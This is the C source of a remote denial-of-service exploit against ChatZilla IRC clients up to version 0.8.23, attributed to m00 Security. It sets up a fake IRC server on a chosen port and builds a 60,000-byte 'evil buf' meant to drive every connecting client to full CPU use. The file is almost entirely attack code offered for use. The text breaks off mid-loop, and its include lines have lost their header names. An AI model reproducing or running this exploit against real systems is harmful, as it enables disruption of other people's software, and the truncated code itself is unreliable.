/* * ChatZilla <=v0.8.23 remote DoS exploit * * by m00 Security // www.m00security.org * * This sploit creats a fake irc-server on any port. Every connected * ChatZilla-client will have cpu-usage 100%. * * Complete advisory: * www.m00security.org/adv/adv003.txt * * -d4rkgr3y [d4rk@securitylab.ru] */ #include #include #include #include #include #include #include #include #include #define COUNT 60000 #define request "NOTICE AUTH :*** Welcome to fake m00 IRCd\n" int main(int argc, char **argv) { struct sockaddr_in db; int sock, i, len, lame; const c = COUNT; char buf[60000] = ":Serv 000 user666 :Welcome to the underworld"; printf("\nChatZilla <=v0.8.23 remote DoS exploit // www.m00security.org\n\n"); if (argc!=2){ printf("[-] error in params. Usage\n %s port\n",argv[0]); exit(1); } else { printf("[~] Generating evil buf...."); } /* constructing evil buf */ for (i=0;i